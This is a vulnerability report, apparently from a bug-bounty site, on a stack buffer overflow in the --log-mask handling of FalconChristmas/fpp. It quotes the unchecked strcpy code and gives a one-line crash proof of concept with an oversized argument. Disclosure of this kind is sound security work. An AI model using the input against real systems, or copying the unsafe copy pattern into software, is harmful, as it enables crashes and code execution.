Stack-based Buffer Overflow in FalconChristmas/fpp

Valid
Reported on May 30th 2021

✍️ Description

Hi,

There is a stack based buffer overflow in https://github.com/FalconChristmas/fpp/blob/f4a1621c8be15a41305269830b700a2b5443aa0f/src/fpp.c#L177 :

    else if((strcmp(argv[1],"--log-mask") == 0) &&  argc > 2)
    {
      char newMask[128];
      strcpy(newMask, argv[2]);//overflow

      /**/
    }

argv[2] is copied into newMask using strcpy, a fucntion that doesn't perform size validation when it copies buffers. This behavior leads to a buffer overflow.

🕵️‍♂️ Proof of Concept

Run : ./fpp --log-mask $(python -c'print("A"*140)')

💥 Impact

Crash, arbitrary code execution